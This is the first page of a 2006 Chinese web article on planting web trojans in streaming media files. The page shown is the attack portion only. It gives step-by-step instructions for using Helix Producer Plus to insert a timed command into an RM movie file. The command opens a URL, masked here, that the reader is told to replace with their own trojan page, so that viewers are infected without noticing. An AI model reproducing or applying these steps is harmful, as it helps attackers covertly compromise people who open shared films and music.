WEB开发网
开发学院网络安全黑客技术 危害巨大 媒体文件木马攻防实战 阅读

危害巨大 媒体文件木马攻防实战

 2006-11-06 20:01:41 来源:WEB开发网   
核心提示:如今网络上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,危害巨大 媒体文件木马攻防实战,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此

如今网络上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。

攻:媒体文件种马于无形

RM、RMVB中加入木马

Helix Producer Plus是一款图形化的专业流媒体文件制作工具,我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式,当然也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,我们甚至还能控制网页木马打开的时间,让网页木马更隐蔽。

步骤1:首先下载Helix Producer Plus,一路“Next”完成安装,然后我们要找一个能把网页木马插入其中的RM电影文件,把它改名为film.rm,然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。

步骤2:我们在这个文件夹中新建一个文本文档,命名为test.txt,在test.txt文件中写入这样一句命令:“u 00:07:00 00:07:30 http://www.***.com/in
dex.php”,这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件,然后到7分30秒的时候事件结束,最后面的就是URL的网址,我们可以把这个网址改成我们的网页木马的地址(关于网页木马的制作和设置已经多次介绍,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,让他不知不觉中招(如图1)。

1 2 3 4  下一页

Tags:危害 巨大 媒体文件

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接